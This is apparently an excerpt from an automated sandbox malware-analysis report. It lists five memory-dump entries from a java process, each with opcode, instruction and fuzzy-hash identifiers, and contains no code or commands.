                                                                                  • Source File: 00000017.00000002.3354987827.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_23_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 95cee24dc0548a90dddbe108f603da2ae8ded5b98963c832d0fff8ab8ce3a76d
                                                                                  • Instruction ID: 142e819b1ae14818371d73660006cf2c8e6ad76f949e4d642fc52fc6d892a1dc
                                                                                  • Opcode Fuzzy Hash: 95cee24dc0548a90dddbe108f603da2ae8ded5b98963c832d0fff8ab8ce3a76d
                                                                                  • Instruction Fuzzy Hash: E531D321B1C9490FEBA8FB6C946A378A6D6EF99315F1405BEF40ED32D3DD68AC418340
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000017.00000002.3354987827.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_23_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 90c42868ca3a7a4f11fe485ab135026aff4053cc574e9e3f6f22445bc6dadd62
                                                                                  • Instruction ID: e156fca14a7f344b80634bf525cb086e92ffab962cf80b902d943ab78a9ccd5f
                                                                                  • Opcode Fuzzy Hash: 90c42868ca3a7a4f11fe485ab135026aff4053cc574e9e3f6f22445bc6dadd62
                                                                                  • Instruction Fuzzy Hash: E731C522B28E595FEB54B7AC586A3BD77D5EF99311F04027AE00DD3293DD2C6C414351
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000017.00000002.3354987827.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_23_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ac5840d113d01a648e80c5a0508f08d9d0b8f2a743c30117e932608c52ee0455
                                                                                  • Instruction ID: baa87a850cf60339e6a4ef933193959855f468a402f31d4bc496858db455ae17
                                                                                  • Opcode Fuzzy Hash: ac5840d113d01a648e80c5a0508f08d9d0b8f2a743c30117e932608c52ee0455
                                                                                  • Instruction Fuzzy Hash: F4419131B18A0A9FEB54FBAC98656FD7BB2FF99301F5405B9D009E7282CD386841C751
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000017.00000002.3354987827.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_23_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 57ae946e3e73409091a8679c6ff65d1087d6e1be7b2a64df5b64210d7fd18a8d
                                                                                  • Instruction ID: ba3c48266d002b4a9c6f229f6342fdec3a02fb613563e67ee9564e94ad64cf60
                                                                                  • Opcode Fuzzy Hash: 57ae946e3e73409091a8679c6ff65d1087d6e1be7b2a64df5b64210d7fd18a8d
                                                                                  • Instruction Fuzzy Hash: 15218D3175CB494FD360EBAC98A64B97F72AB89200B8045EDD448D7397CE286E608B52
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000017.00000002.3354987827.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_23_2_7ffd34800000_java.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 36cc477e022d3b761801a55d2b6af7be195c6a17442bc44aa7039f1d512484e4
                                                                                  • Instruction ID: 1f8bbeb47a5f2092672c657ffb3172dd804b1b3eb221b4b13b970eb20fe6196a
                                                                                  • Opcode Fuzzy Hash: 36cc477e022d3b761801a55d2b6af7be195c6a17442bc44aa7039f1d512484e4
                                                                                  • Instruction Fuzzy Hash: 1A01F414A2C6810FE785A73C58A44767FE19FD6250B4808AAEC88D61A7EC4CAD959392